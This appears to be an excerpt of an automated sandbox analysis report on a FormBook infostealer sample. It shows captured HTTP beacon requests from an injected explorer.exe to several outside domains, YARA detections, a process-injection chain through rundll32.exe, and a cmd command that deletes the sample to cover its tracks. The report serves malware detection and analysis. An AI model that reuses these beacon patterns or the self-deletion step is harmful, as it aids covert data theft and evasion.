                                                                        May 12, 2021 12:26:08.493067980 CEST5552OUTGET /a8si/?NZb=O3o1U+q8oMW0A40QuM4kzZFzuvGZx18F2J1jOj0HsFueYiG3dIptHphoRZJy//fOFehA&2dND=GVTl- HTTP/1.1
                                                                        Host: www.4520oceanviewavenue.com
                                                                        Connection: close
                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                        Data Ascii:
                                                                        May 12, 2021 12:26:08.756416082 CEST5553INHTTP/1.1 200 OK
                                                                        Server: nginx/1.16.1
                                                                        Date: Wed, 12 May 2021 10:26:08 GMT
                                                                        Content-Type: text/html; charset=utf-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: close
                                                                        Data Raw: 31 66 66 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 0a 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 0a 0a 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 54 6f 75 72 20 49 6d 61 67 69 6e 67 20 56 69 72 74 75 61 6c 20 54 6f 75 72 73 3c 2f 74 69 74 6c 65 3e 20 20 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 54 6f 75 72 20 49 6d 61 67 69 6e 67 20 56 69 72 74 75 61 6c 20 54 6f 75 72 73 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 54 6f 75 72 20 49 6d 61 67 69 6e 67 20 56 69 72 74 75 61 6c 20 54 6f 75 72 73 22 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 66 72 61 6d 65 73 65 74 20 72 6f 77 73 3d 22 31 30 30 25 2c 2a 22 20 62 6f 72 64 65 72 3d 22 30 22 3e 0a 20 20 3c 66 72 61 6d 65 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 74 6f 75 72 73 2e 74 6f 75 72 69 6d 61 67 69 6e 67 2e 63 6f 6d 2f 73 2f 69 64 78 2f 35 37 37 30 33 33 3f 4e 5a 62 3d 4f 33 6f 31 55 2b 71 38 6f 4d 57 30 41 34 30 51 75 4d 34 6b 7a 5a 46 7a 75 76 47 5a 78 31 38 46 32 4a 31 6a 4f 6a 30 48 73 46 75 65 59 69 47 33 64 49 70 74 48 70 68 6f 52 5a 4a 79 2f 2f 66 4f 46 65 68 41 26 61 6d 70 3b 32 64 4e 44 3d 47 56 54 6c 2d 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 2f 3e 0a 3c 2f 66 72 61 6d 65 73 65 74 3e 0a 0a 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: 1ff<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head> <title>Tour Imaging Virtual Tours</title> <meta name="description" content="Tour Imaging Virtual Tours"> <meta name="keywords" content="Tour Imaging Virtual Tours"></head><frameset rows="100%,*" border="0"> <frame src="http://tours.tourimaging.com/s/idx/577033?NZb=O3o1U+q8oMW0A40QuM4kzZFzuvGZx18F2J1jOj0HsFueYiG3dIptHphoRZJy//fOFehA&amp;2dND=GVTl-" frameborder="0" /></frameset></html>0


                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                        7192.168.2.34974464.98.145.3080C:\Windows\explorer.exe
                                                                        TimestampkBytes transferredDirectionData
                                                                        May 12, 2021 12:26:14.073214054 CEST5570OUTGET /a8si/?NZb=jdN+3RUems8XgJANUws4WWtkbvXxMu2hTQ/t6K3f+t8prXi7JgWKk+q+WHlFohFhnqtz&2dND=GVTl- HTTP/1.1
                                                                        Host: www.omfgphil.com
                                                                        Connection: close
                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                        Data Ascii:
                                                                        May 12, 2021 12:26:14.218874931 CEST5572INHTTP/1.1 303 See Other
                                                                        Content-Type: text/html; charset=utf-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: close
                                                                        Status: 303 See Other
                                                                        X-Frame-Options: SAMEORIGIN
                                                                        X-XSS-Protection: 1; mode=block
                                                                        X-Content-Type-Options: nosniff
                                                                        Location: https://vm.tiktok.com/ZMJE3suep/a8si?NZb=jdN+3RUems8XgJANUws4WWtkbvXxMu2hTQ/t6K3f+t8prXi7JgWKk+q+WHlFohFhnqtz&2dND=GVTl-
                                                                        Cache-Control: no-cache
                                                                        X-Request-Id: 98627d13-1f0d-4d0f-ac6c-3f13cb1515d0
                                                                        X-Runtime: 0.006362
                                                                        X-Powered-By: Phusion Passenger 4.0.53
                                                                        Date: Wed, 12 May 2021 10:29:49 GMT
                                                                        Server: nginx/1.6.2 + Phusion Passenger 4.0.53
                                                                        P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
                                                                        Data Raw: 62 65 0d 0a 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 59 6f 75 20 61 72 65 20 62 65 69 6e 67 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 76 6d 2e 74 69 6b 74 6f 6b 2e 63 6f 6d 2f 5a 4d 4a 45 33 73 75 65 70 2f 61 38 73 69 3f 4e 5a 62 3d 6a 64 4e 2b 33 52 55 65 6d 73 38 58 67 4a 41 4e 55 77 73 34 57 57 74 6b 62 76 58 78 4d 75 32 68 54 51 2f 74 36 4b 33 66 2b 74 38 70 72 58 69 37 4a 67 57 4b 6b 2b 71 2b 57 48 6c 46 6f 68 46 68 6e 71 74 7a 26 61 6d 70 3b 32 64 4e 44 3d 47 56 54 6c 2d 22 3e 72 65 64 69 72 65 63 74 65 64 3c 2f 61 3e 2e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                        Data Ascii: be<html><body>You are being <a href="https://vm.tiktok.com/ZMJE3suep/a8si?NZb=jdN+3RUems8XgJANUws4WWtkbvXxMu2hTQ/t6K3f+t8prXi7JgWKk+q+WHlFohFhnqtz&amp;2dND=GVTl-">redirected</a>.</body></html>


                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                        8192.168.2.349746184.168.131.24180C:\Windows\explorer.exe
                                                                        TimestampkBytes transferredDirectionData
                                                                        May 12, 2021 12:26:30.319866896 CEST5588OUTGET /a8si/?NZb=4F1bkU/AiPiMeDtr2vTtPD5XJl4c4IZLVeC3bIU2IShR3AvGXFCeCpQ25wAjwLp6N7J6&2dND=GVTl- HTTP/1.1
                                                                        Host: www.boostcoachingonline.com
                                                                        Connection: close
                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                        Data Ascii:
                                                                        May 12, 2021 12:26:30.541549921 CEST5589INHTTP/1.1 301 Moved Permanently
                                                                        Server: nginx/1.16.1
                                                                        Date: Wed, 12 May 2021 10:26:30 GMT
                                                                        Content-Type: text/html; charset=utf-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: close
                                                                        Location: http://zoom.us/j/8574583197?pwd=R20vRUg0bGh1THUxUDZZQm9JVlRadz09
                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                        Data Ascii: 0


                                                                        Code Manipulations

                                                                        Statistics

                                                                        Behavior

                                                                        Click to jump to process

                                                                        System Behavior

                                                                        Analysis Process: 457b22da_by_Libranalysis.exe PID: 4120 Parent PID: 5652

                                                                        General

                                                                        Start time:12:24:19
                                                                        Start date:12/05/2021
                                                                        Path:C:\Users\user\Desktop\457b22da_by_Libranalysis.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:'C:\Users\user\Desktop\457b22da_by_Libranalysis.exe'
                                                                        Imagebase:0x250000
                                                                        File size:973824 bytes
                                                                        MD5 hash:457B22DA77D4DB093A31DD80A4B8963F
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:.Net C# or VB.NET
                                                                        Yara matches:
                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.238968916.00000000037E7000.00000004.00000001.sdmp, Author: Joe Security
                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.238968916.00000000037E7000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.238968916.00000000037E7000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                        • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.237432147.00000000027E3000.00000004.00000001.sdmp, Author: Joe Security
                                                                        Reputation:low

                                                                        Analysis Process: 457b22da_by_Libranalysis.exe PID: 5452 Parent PID: 4120

                                                                        General

                                                                        Start time:12:24:28
                                                                        Start date:12/05/2021
                                                                        Path:C:\Users\user\Desktop\457b22da_by_Libranalysis.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:C:\Users\user\Desktop\457b22da_by_Libranalysis.exe
                                                                        Imagebase:0xd80000
                                                                        File size:973824 bytes
                                                                        MD5 hash:457B22DA77D4DB093A31DD80A4B8963F
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Yara matches:
                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.276852950.0000000001400000.00000040.00000001.sdmp, Author: Joe Security
                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.276852950.0000000001400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.276852950.0000000001400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.276548151.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.276548151.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.276548151.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.276831846.00000000013D0000.00000040.00000001.sdmp, Author: Joe Security
                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.276831846.00000000013D0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.276831846.00000000013D0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                        Reputation:low

                                                                        Analysis Process: explorer.exe PID: 3388 Parent PID: 5452

                                                                        General

                                                                        Start time:12:24:31
                                                                        Start date:12/05/2021
                                                                        Path:C:\Windows\explorer.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:
                                                                        Imagebase:0x7ff714890000
                                                                        File size:3933184 bytes
                                                                        MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high

                                                                        Analysis Process: rundll32.exe PID: 852 Parent PID: 3388

                                                                        General

                                                                        Start time:12:24:45
                                                                        Start date:12/05/2021
                                                                        Path:C:\Windows\SysWOW64\rundll32.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:C:\Windows\SysWOW64\rundll32.exe
                                                                        Imagebase:0x1340000
                                                                        File size:61952 bytes
                                                                        MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Yara matches:
                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.481738454.00000000011E0000.00000004.00000001.sdmp, Author: Joe Security
                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.481738454.00000000011E0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.481738454.00000000011E0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.478757286.00000000008F0000.00000040.00000001.sdmp, Author: Joe Security
                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.478757286.00000000008F0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.478757286.00000000008F0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.480717659.0000000000D10000.00000040.00000001.sdmp, Author: Joe Security
                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.480717659.0000000000D10000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.480717659.0000000000D10000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                        Reputation:high

                                                                        Analysis Process: cmd.exe PID: 5448 Parent PID: 852

                                                                        General

                                                                        Start time:12:24:50
                                                                        Start date:12/05/2021
                                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:/c del 'C:\Users\user\Desktop\457b22da_by_Libranalysis.exe'
                                                                        Imagebase:0x2d0000
                                                                        File size:232960 bytes
                                                                        MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high

                                                                        Analysis Process: conhost.exe PID: 6084 Parent PID: 5448

                                                                        General

                                                                        Start time:12:24:50
                                                                        Start date:12/05/2021
                                                                        Path:C:\Windows\System32\conhost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                        Imagebase:0x7ff6b2800000
                                                                        File size:625664 bytes
                                                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high

                                                                        Disassembly

                                                                        Code Analysis

                                                                        Reset < >